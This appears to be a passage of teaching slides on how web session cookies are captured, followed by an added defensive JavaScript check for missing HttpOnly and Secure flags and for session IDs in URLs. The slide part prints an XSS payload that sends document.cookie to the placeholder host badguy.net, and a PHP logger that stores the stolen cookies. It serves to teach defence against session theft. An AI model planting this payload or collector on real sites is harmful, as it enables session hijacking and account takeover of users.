Sessions :: Capture
XSS
Sniffing - tcpdump, ethereal, etc.
Referer header leakage - URL-based (remote avatar icons)
<script>
// The image request carries the cookie in its query string
var x = new Image();
x.src = 'http://badguy.net/x.php?steal=' + document.cookie;
</script>
// x.php: append the request URI (including the query string) to a log file
$fp = fopen('stolen_cookies.log', 'a');
fwrite($fp, $_SERVER["REQUEST_URI"]);
fclose($fp);
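A check for the three capture paths listed on this slide, as an added example that is not part of the original slides: it audits a response's Set-Cookie headers and page URL for the missing protections. The function names, the list of session parameter names and the sample URLs and headers are constructed assumptions.

```javascript
// Added example (not from the original slide). The session-parameter names
// and the sample responses below are constructed assumptions.
const SESSION_PARAM = /[?&](phpsessid|sid|sessionid|jsessionid)=/i;

// Parse one Set-Cookie header value into its name and lowercase attribute set.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const name = pair.split('=')[0];
  const flags = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  return { name, flags };
}

// Return one finding per capture path the response leaves open.
function auditSession(pageUrl, setCookieHeaders) {
  const findings = [];
  for (const header of setCookieHeaders) {
    const { name, flags } = parseSetCookie(header);
    if (!flags.has('httponly')) {
      findings.push(`${name}: no HttpOnly, readable by script via document.cookie`);
    }
    if (!flags.has('secure')) {
      findings.push(`${name}: no Secure, sent over plain HTTP where it can be sniffed`);
    }
  }
  const url = new URL(pageUrl);
  if (SESSION_PARAM.test(url.search) || /;jsessionid=/i.test(url.pathname)) {
    findings.push('URL carries a session ID, exposed in Referer to remote resources');
  }
  return findings;
}

// Constructed sample: a forum page with a URL-based session and a bare cookie.
const weak = auditSession(
  'http://forum.example/viewtopic.php?t=7&PHPSESSID=abc123',
  ['PHPSESSID=abc123; path=/']
);
// Constructed sample: cookie-only session with both flags set.
const hardened = auditSession(
  'https://forum.example/viewtopic.php?t=7',
  ['PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax']
);
console.log(weak, hardened);
```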